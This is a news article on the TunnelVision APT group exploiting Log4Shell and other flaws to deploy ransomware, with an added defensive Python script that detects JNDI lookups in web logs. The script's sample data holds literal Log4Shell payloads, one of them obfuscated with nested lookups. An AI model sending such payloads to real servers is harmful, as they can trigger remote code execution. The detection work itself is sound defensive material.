The TunnelVision APT group still exploits Log4Shell in attacks

March 2, 2022

The TunnelVision advanced persistent threat (APT) group has kept exploiting the critical Log4j flaw (Log4Shell) to deploy ransomware, even though vendors released patches for the vulnerability long ago. Researchers assess that the group is linked to the Iranian government and that it targets unpatched VMware Horizon servers.

In its recent attacks TunnelVision has been observed exploiting one-day flaws such as Exchange ProxyShell and CVE-2018-13379 in FortiOS. It also abuses the Log4Shell vulnerability in VMware Horizon to run PowerShell commands whose output is sent back to its operators through a webhook.
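For defenders watching Horizon-facing web servers, the first step of the chain described above (a Log4Shell JNDI lookup arriving in a request) is the one that is easiest to spot in logs. The following is an added example written for this article, not code from the article or from the researchers it cites: it scans constructed sample access-log lines for `${jndi:...}` lookups, first undoing the common `${lower:x}`, `${upper:x}` and `${...:-x}` nesting that attackers use to hide the string from naive matching. The log lines, hosts and IP addresses are all made up for the example, and the set of nesting forms it unwraps is an assumption, not an exhaustive list.

```python
import re

# Constructed sample access-log lines (not from the article). Line 2 carries a plain
# JNDI lookup in the User-Agent; line 3 carries a nested-lookup variant in the query string.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:09 +0000] "GET /?x=${${lower:j}ndi:rmi://203.0.113.10/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.12 - - [10/Dec/2021:12:01:00 +0000] "POST /broker/xml HTTP/1.1" 200 0 "-" "VMware Horizon Client"',
]

# Innermost lookups only (no "${" inside), so repeated substitution unwraps nesting inside-out.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)   # ${lower:j} -> j
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")                        # ${env:X:-j} / ${::-j} -> j

# After normalisation a real lookup starts with "${jndi:<scheme>://<host>".
_JNDI = re.compile(r"\$\{jndi:(\w+)://([^/}\s:]+)", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Collapse the nesting tricks listed above until the string stops changing."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_log4shell_indicators(lines):
    """Return one finding per log line that contains a JNDI lookup after normalisation."""
    findings = []
    for line_no, raw in enumerate(lines, start=1):
        normalized = normalize_lookups(raw)
        match = _JNDI.search(normalized)
        if match:
            findings.append({
                "line_no": line_no,
                "scheme": match.group(1).lower(),
                "host": match.group(2),          # the callback host the lookup would contact
                "normalized": normalized,
            })
    return findings


if __name__ == "__main__":
    for hit in find_log4shell_indicators(SAMPLE_LOG_LINES):
        print(f"line {hit['line_no']}: jndi scheme={hit['scheme']} host={hit['host']}")
```

The callback host extracted from each finding is the value worth pivoting on: it can be cross-checked against the published TunnelVision IOCs and against outbound connection logs from the Horizon host, since a successful lookup is followed by a connection from the server to that host. Matching only the literal string `${jndi:` without the normalisation step misses the nested form on line 3.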

These PowerShell commands download tools such as Ngrok to support the ransomware operation. The PowerShell payload also spawns reverse shells and launches a dedicated backdoor that harvests credentials and moves laterally from the infected host.

The researchers also stressed that most of the group’s attacks relied on the Fast Reverse Proxy Client (FRPC) and the Plink tunnelling tool.


The TunnelVision APT group may be affiliated with another advanced persistent threat group known as APT35.


Based on recent analysis, TunnelVision’s tactics, techniques, and procedures (TTPs) overlap with those of the Iranian state-sponsored threat group APT35, which is also tracked under names such as Nemesis Kitten, Phosphorus, and Charming Kitten.

Furthermore, the researchers said that the backdoor drops an executable containing an obfuscated reverse shell identical to the PowerLess backdoor that APT35 used in a recent series of ransomware campaigns.

Experts also report that the APT35 group has abused a GitHub repository named VmWareHorizon, tied to an account called protections20, which is operated by state-sponsored threat actors.

Because the TunnelVision APT group abuses several different flaws and is tracked by security vendors under several names, experts urge organisations to share what they know about the group and to make use of the published IOCs.

Organisations should also ensure that their software and operating systems are kept up to date and patched with the latest fixes.
